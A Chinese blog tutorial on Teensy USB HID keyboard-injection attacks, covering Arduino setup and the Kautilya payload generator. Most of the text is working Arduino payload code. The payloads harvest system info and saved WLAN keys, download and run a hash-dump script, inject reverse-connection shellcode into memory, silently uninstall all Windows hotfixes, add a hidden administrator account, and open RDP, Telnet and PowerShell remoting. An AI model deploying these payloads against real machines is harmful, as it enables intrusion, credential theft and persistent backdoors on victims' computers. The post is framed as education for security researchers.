首页 > 代码库 > Teensy HID攻击科普文

Teensy HID攻击科普文

0x00 前言:

       在2014年美国黑帽大会上,柏林SRLabs的安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”(按照BadBIOS命名)的攻击方法。在认识BadUSB之前我们来先了解一种类似的攻击手法,使用Teensy芯片进行HID攻击,这种手法要古老的多,2010年左右,通过U盘伪装成为USB键盘输入恶意代码的攻击方式就已经相当成熟,并将这种攻击方式称为“Teensy HID攻击”,Kautilya也是在2012年的黑帽大会放出,所以此科普文干货不多,大牛绕过。


0x01 什么是HID攻击

      HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。


0x02 什么是Teensy

     攻击者在定制攻击设备时,会向USB设备中置入一个攻击芯片,此芯片叫Teensy,是一个非常小的完整的基于USB接口的单片机开发系统,能够实现多种类型的项目。所有的编程是通过USB端口。在没有特殊的程序要求下,只有一个标准的Mini-B USB电缆和PC或Macintosh电脑的USB端口。

主要特点:

可以是任何类型设备的USB

AVR处理器,16 MHz

单个按键编程

易于使用的Teensy Loader应用程序

免费软件开发工具

兼容Mac OS X,Linux和Windows

小尺寸,许多项目的完美支持

使用标签面包板

非常低的成本

下图为笔者的teensy 2.0++开发板

wKiom1RMorug8YwNAATpBBl2b9Y620.jpg

0x03 Arduino的安装和介绍

对Teensy芯片进行开发,就要用到Arduino中进行,Arduino IDE具有使用类似Java,C语言的Processing/Wiring开发环境。环境安装与搭建也非常便捷,我们通过Arduino将攻击代码编译上传到Teensy芯片中。可以从http://www.arduino.cc下载安装包,进行安装。安装完Arduino IDE之后,还需要Teensy芯片的SDK支持库,支持库可以从如下地址获取http://www.pjrc.com/teensy/td_download.html。安装时需要选择Arduino IDE的安装路径,安装完成以后,还需要选择相应的开发板,我们这里应该选择Teensy2.0如下图所示,至此整体开发环境就搭建完成了。

注意选择Board为“Teensy ++ 2.0”,USB Type为“Keyboard + Mouse + Joystick”

wKioL1RMpH6hFwuHAAQNCf729dg783.jpg


使用方法也非常简单,将生成的pde文件打开后点击最上边的两个按钮完成验证和上传工作。

wKiom1RMpCuBhLUwAAHe8Jg4xzw263.jpg

另外推荐下小工具Teensy Loader

下载地址:http://www.pjrc.com/teensy/teensy.exe

wKiom1RMpETiDokXAACsthObMpo694.jpg

他可以用来判断teensy状态,teensy目前脚本名称以及对teensy进行重启操作。

0x04 Kautilya渗透测试套件

目前Arduino渗透脚本生成工具有Social Engineering Toolkit(SET)工具包提供的Arduino-Based Attack Vector,以及BlackHat2012提供的微型设备渗透测试脚本集Kautilya,SET工具包的用法很多博客论坛都有提到过,大致效果是通过powershell或者wscript的方式下载msf payload或者可执行文件,然后执行从而获得反弹shell或者后门木马。相比较而言Kautilya功能非常丰富。

Github项目链接:https://github.com/samratashok/Kautilya

下载解压后对kautilya.rb赋执行权限,执行bundle install获取对rb组件支持,然后./kautilya.rb就可以运行该程序,如下图所示:

wKiom1RMmmXSqA88AAkNhBYRmXA015.jpg

程序界面也很友好,选择Payloads项目,并按提示输入参数即可生成pde脚本,剩下的交给Arduino IDE编译上传即可。

脚本可以大致分两类,一类是执行,通过键入命令来修改系统配置,替换文件等等;一类是获取信息,通过键入命令获取当前系统信息,并且通过ftp、Gmail、HTTP POST等多种方式向外发送。

这里我们调几个payload关键代码学习下:

1、获取信息:

Keyboard.println("echo $pn = $env:COMPUTERNAME + \"  Info\" > %temp%\\in.ps1");
  Keyboard.println("echo $user = \"test\" >> %temp%\\in.ps1");
  Keyboard.println("echo $pass = \"INPUT2\" >> %temp%\\in.ps1");
  Keyboard.println("echo $dev = \"INPUT3\" >> %temp%\\in.ps1");
  delay(1000);
  Keyboard.println("echo function regv($rk, $rg,$ch) >> %temp%\\in.ps1");
  Keyboard.println("echo { >> %temp%\\in.ps1");
  Keyboard.println("echo if ($ch -eq \"no\"){$key = get-item $rk} >> %temp%\\in.ps1");
  Keyboard.println("echo else{$key = ls $rk} >> %temp%\\in.ps1");
  Keyboard.println("echo $key ^| >> %temp%\\in.ps1");
  Keyboard.println("echo ForEach-Object { >> %temp%\\in.ps1");
  Keyboard.println("echo $v = gp $_.PSPath >> %temp%\\in.ps1");
  Keyboard.println("echo ForEach ($value in $_.Property) >> %temp%\\in.ps1");
  Keyboard.println("echo { >> %temp%\\in.ps1");
  Keyboard.println("echo if ($rg -eq \"all\") {$v.$value} >> %temp%\\in.ps1");
  Keyboard.println("echo elseif ($rg -eq \"allname\"){$value} >> %temp%\\in.ps1");
  Keyboard.println("echo else {$v.$rg;break} >> %temp%\\in.ps1");
  Keyboard.println("echo }}} >> %temp%\\in.ps1");

  Keyboard.println("echo $o = \"Logged in users:`n\" + (regv \"hklm:\\software\\microsoft\\windows nt\\currentversion\\profilelist\" \"profileimagepath\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n PS Env:`n\" + (regv \"hklm:\\software\\microsoft\\powershell\1\" \"allname\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Putty trusted hosts:`n\" + (regv \"hkcu:\\software\\simontatham\\putty\" \"allname\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Putty saved sessions:`n\" + (regv \"hkcu:\\software\\simontatham\\putty\\sessions\" \"all\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Shares:`n\" + (regv \"hklm:\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Shares\" \"all\" \"no\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Env vars:`n\" + (regv \"hklm:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" \"all\" \"no\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Current user:`n\" + (regv \"hkcu:\\Volatile Environment\" \"all\" \"no\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n SNMP cs:`n\" + (regv \"hklm:\\SYSTEM\\CurrentControlSet\\services\\snmp\\parameters\\validcommunities\" \"all\" \"no\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n SNMP cs - user:`n\" + (regv \"hkcu:\\SYSTEM\\CurrentControlSet\\services\\snmp\\parameters\\validcommunities\" \"all\" \"no\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Installed Apps:`n\" + (regv \"hklm:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" \"displayname\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Installed Apps - user:`n\" + (regv \"hkcu:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" \"displayname\") >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Domain:`n\" + (regv \"hklm:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\\" \"all\" \"no\") >> %temp%\\in.ps1");

  Keyboard.println("echo $o = $o + \"`n Contents of /etc/hosts:`n\" + (gc -path \"C:\\windows\\System32\\drivers\\etc\\hosts\") >> %temp%\\in.ps1");

  Keyboard.println("echo $o = $o + \"`n Running Services:`n\" + (net start) >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Account Policy:`n\" + (net accounts) >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Local users:`n\" + (net user) >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n Local Groups:`n\" + (net localgroup) >> %temp%\\in.ps1");
  Keyboard.println("echo $o = $o + \"`n WLAN Info:`n\" + (netsh wlan show all) >> %temp%\\in.ps1");

  Keyboard.println("echo $o = $o.Replace(\"/\",\"\\\") >> %temp%\\in.ps1");
  Keyboard.println("echo $pv = $o.Replace(\"www\",\"uuu\") >> %temp%\\in.ps1");
  
  
  Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\in.vbs");
  Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\in.ps1\"),0,true >> %temp%\\in.vbs");
  delay(1000);
  Keyboard.println("wscript %temp%\\in.vbs");
  delay(3000);
  Keyboard.println("exit");

2、Hash Dump

  Keyboard.println("echo $pn = $env:COMPUTERNAME + \"  Dump of Password hashes\" > %temp%\\dl.ps1");
  Keyboard.println("echo $user = \"test222\" >> %temp%\\dl.ps1");
  Keyboard.println("echo $pass = \"INPUT2\" >> %temp%\\dl.ps1");
  Keyboard.println("echo $dev = \"INPUT3\" >> %temp%\\dl.ps1");
  Keyboard.println("echo $wc = New-Object System.Net.WebClient >> %temp%\\dl.ps1");
  Keyboard.println("echo $pv = iex $wc.DownloadString(\"test\") >> %temp%\\dl.ps1");

3、获取本地wlan保存密码

  Keyboard.println("echo $pn = $env:COMPUTERNAME + \"  WLAN-Keys\" > %temp%\\wl.ps1");
  Keyboard.println("echo $user = \"test\" >> %temp%\\wl.ps1");
  Keyboard.println("echo $pass = \"INPUT2\" >> %temp%\\wl.ps1");
  Keyboard.println("echo $dev = \"INPUT3\" >> %temp%\\wl.ps1");
  Keyboard.println("echo $w = netsh wlan show profiles ^| sls -Pattern \"All User Profile\" ^| foreach {$_.ToString()} >> %temp%\\wl.ps1");
  Keyboard.println("echo $ed = $w ^| foreach {$_.Replace(\"    All User Profile     : \",$null)} >> %temp%\\wl.ps1");
  Keyboard.println("echo $pv = $ed ^| foreach {netsh wlan show profiles name=\"$_\" key=clear} >> %temp%\\wl.ps1");

4、建立热点

 Keyboard.println("netsh wlan set hostednetwork mode=allow ssid=SSIDTEST key=12345678");
  delay(5000);
  Keyboard.println("netsh wlan start hostednetwork");
  delay(5000);
  Keyboard.println("netsh advfirewall firewall add rule name=\"Powershell Update\" dir=in action=allow protocol=TCP localport=33");
  delay(3000);
  Keyboard.println("echo $code = @‘ > %temp%\\ce.ps1");
  Keyboard.println("echo [DllImport(\"kernel32.dll\")] >> %temp%\\ce.ps1");
  Keyboard.println("echo public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); >> %temp%\\ce.ps1");
  Keyboard.println("echo [DllImport(\"kernel32.dll\")] >> %temp%\\ce.ps1");
  Keyboard.println("echo public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); >> %temp%\\ce.ps1");
  Keyboard.println("echo [DllImport(\"msvcrt.dll\")] >> %temp%\\ce.ps1");
  Keyboard.println("echo public static extern IntPtr memset(IntPtr dest, uint src, uint count); >> %temp%\\ce.ps1");
  Keyboard.println("echo ‘@ >> %temp%\\ce.ps1");
  Keyboard.println("echo $winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru >> %temp%\\ce.ps1");
  Keyboard.println("echo [Byte[]]$sc = >> %temp%\\ce.ps1");

  Keyboard.println("echo 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, >> %temp%\\ce.ps1");
Keyboard.println("echo 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, >> %temp%\\ce.ps1");
Keyboard.println("echo 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0xfe,0xb7,0x41,0x54, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff, >> %temp%\\ce.ps1");
Keyboard.println("echo 0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41, >> %temp%\\ce.ps1");
Keyboard.println("echo 0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31, >> %temp%\\ce.ps1");
Keyboard.println("echo 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41, >> %temp%\\ce.ps1");
Keyboard.println("echo 0xff,0xe7 >> %temp%\\ce.ps1");


  Keyboard.println("echo $size = 0x1000 >> %temp%\\ce.ps1");
  Keyboard.println("echo if ($sc.Length -gt 0x1000) {$size = $sc.Length} >> %temp%\\ce.ps1");
  Keyboard.println("echo $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) >> %temp%\\ce.ps1");
  Keyboard.println("echo for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} >> %temp%\\ce.ps1");
  Keyboard.println("echo $winFunc::CreateThread(0,0,$x,0,0,0) >> %temp%\\ce.ps1");
  Keyboard.println("echo while(1){sleep 100} >> %temp%\\ce.ps1");
  Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\ce.vbs");
  Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\ce.ps1\"),0,true >> %temp%\\ce.vbs");
  delay(1000);
  Keyboard.println("wscript %temp%\\ce.vbs");
  delay(3000);
  Keyboard.println("exit");

5、移除系统更新

  Keyboard.println("echo $hfs = Get-HotFix > %temp%\\ru.ps1");
  Keyboard.println("echo $KBID = \"ALL\" >> %temp%\\ru.ps1");
  Keyboard.println("echo  foreach ($hf in $hfs) {>> %temp%\\ru.ps1");
  Keyboard.println("echo if ($KBID -eq $hf.HotfixId) { >> %temp%\\ru.ps1");
  Keyboard.println("echo $KBID = $hf.HotfixId.Replace(\"KB\", \"\") >> %temp%\\ru.ps1");
  Keyboard.println("echo $rc = \"wusa.exe /uninstall /kb:$KBID /quiet /norestart\" >> %temp%\\ru.ps1");
  Keyboard.println("echo iex $rc >> %temp%\\ru.ps1");
  Keyboard.println("echo break } >> %temp%\\ru.ps1");
  Keyboard.println("echo if ($KBID -match \"All\") { >> %temp%\\ru.ps1");
  Keyboard.println("echo $kn = $hf.HotfixId.Replace(\"KB\", \"\") >> %temp%\\ru.ps1");
  Keyboard.println("echo $rc = \"wusa.exe /uninstall /kb:$kn /quiet /norestart\" >> %temp%\\ru.ps1");
  Keyboard.println("echo iex $rc } >> %temp%\\ru.ps1");
  Keyboard.println("echo if ($KBID -match \"Security\") { >> %temp%\\ru.ps1");
  Keyboard.println("echo if ($hf.Description -match \"Security\") {>> %temp%\\ru.ps1");
  Keyboard.println("echo $ks = $hf.HotfixId.Replace(\"KB\", \"\") >> %temp%\\ru.ps1");
  Keyboard.println("echo $rc = \"wusa.exe /uninstall /kb:$ks /quiet /norestart\" >> %temp%\\ru.ps1");
  Keyboard.println("echo  iex $rc } } }>> %temp%\\ru.ps1");

  Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\ru.vbs");
  Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\ru.ps1\"),0,true >> %temp%\\ru.vbs");
  delay(1000);
  Keyboard.println("wscript %temp%\\ru.vbs");
  delay(3000);
  Keyboard.println("exit");

6、强制浏览网页(以百度为例)

  minimise_windows();
  delay(500);
  while(!cmd(3,500,"cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\""))
  {
  reset_windows_desktop(2000);
  }
  
  Keyboard.println("echo $ie = new-object -comobject \"InternetExplorer.Application\" > %temp%\\bs.ps1");
  Keyboard.println("echo $ie.visible = $false >> %temp%\\bs.ps1");
  Keyboard.println("echo $ie.navigate(\"www.baidu.com\") >> %temp%\\bs.ps1");

7、添加管理员用户

# define U_ADD "net user evilsky 1234!@#$ /add"
# define G_ADD "net localgroup Administrators evilsky /add"

void setup() { 
 delay(3000);
  wait_for_drivers(2000);

  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }
    Keyboard.println(U_ADD);
    delay(2000);
    Keyboard.println(G_ADD);
    delay(1000);
    Keyboard.println("exit");
}

8、修改默认DNS地址

  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }
  Keyboard.println("netsh interface ip set dns \"Local Area Connection\" static 114.114.114.114");
  delay(3000);

  Keyboard.println("exit");

9、编辑hosts文件

  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }
  Keyboard.println("echo 127.0.0.1 www.baidu.com>>%systemroot%\\system32\\drivers\\etc\\hosts");
  delay(2000);
  Keyboard.println("exit");

10、添加用户并打开3389远程桌面

# define PAYLOAD_USER_ADD "net user evilsky 1234!@#$ /add"
# define PAYLOAD_GROUP_ADD "net localgroup Administrators evilsky /add"

void setup(){
 delay(3000);
  wait_for_drivers(2000);

  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }
add_user();
Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
delay(2000);
Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f");
delay(2000);
Keyboard.println("sc start termservice");
delay(2000);
Keyboard.println("netsh firewall set service type = remotedesktop mode = enable");
delay(3000);
Keyboard.println("exit");
}

11、添加用户并打开telnet终端服务

# define PAYLOAD_USER_ADD "net user evilsky 1234!@#$ /add"
# define PAYLOAD_GROUP_ADD "net localgroup Administrators evilsky /add"
# define PAYLOAD_TELNETGROUP_ADD "net localgroup TelnetClients evilsky /add"

void setup(){

 delay(3000);
  wait_for_drivers(2000);

  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }

add_user();
Keyboard.println("pkgmgr /iu:\"TelnetServer\"");
delay(10000);
Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TlntSvr\" /v Start /t REG_DWORD /d 2 /f");
delay(2000);
Keyboard.println("sc config TlntSvr start= auto");
delay(2000);
Keyboard.println("sc start TlntSvr");
delay(2000);
Keyboard.println("netsh firewall set portopening protocol = tcp port = 23 mode = enable");
delay(3000);
Keyboard.println("exit");
}

12、添加用户并打开远程powershell

# define PAYLOAD_USER_ADD "net user evilsky 1234!@#$ /add"
# define PAYLOAD_GROUP_ADD "net localgroup Administrators evilsky /add"

void setup(){
 delay(3000);
  wait_for_drivers(2000);

  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }
add_user();
Keyboard.println("powershell.exe Enable-PSRemoting -SkipNetworkProfileCheck -Force;Set-NetFirewallRule –Name \"WINRM-HTTP-In-TCP-PUBLIC\" –RemoteAddress Any");
delay(2000);
Keyboard.println("exit");
}

0x05 结语:

      作为n年前就被公开的技术,HID攻击并不新鲜,但是通过尝试使用发现效果远比想像的要好很多,在设备插入后,可以免驱动非常快的执行相关操作,但值得注意的是大部分操作是通过模拟键盘输入来实现的,所以就有个前提必须是在登录的状态下才可以执行攻击操作,并且如果打开UAC功能,很多操作会有windows提示,必须通过鼠标点击确定才可以执行,而且win8效果很不好,在win7不开UAC的情况下是最理想的。

      下一步计划在研究下BadUSB的玩法,需要PS2251-03 (2303) 芯片的优盘,笔者还在挑选,待实践成功再写一篇关于BadUSB的博文。


0x06 参考:

Teensy 2.0渗透教程:

http://acmai.com/2013/08/315/

Teensy HID新型攻击方式(Kautilya渗透测试套件)

http://www.xocoder.com/archives/1328

[BlackHat2012工具]微型设备(Teensy)渗透测试脚本集Kautilya

http://www.freebuf.com/tools/5280.html

BadUSB的前世今生:USB RUBBER DUCKY和Teensy USB

http://www.freebuf.com/tools/47411.html

一个U盘黑掉你:HID攻击之TEENSY实战

http://sec.chinabyte.com/410/13056910.shtml

使用TeensyLoader

http://wiki.radiowar.org/%E4%BD%BF%E7%94%A8TeensyLoader

本文出自 “M4tr1x” 博客,请务必保留此出处http://matr1x.blog.51cto.com/6698309/1568198

Teensy HID攻击科普文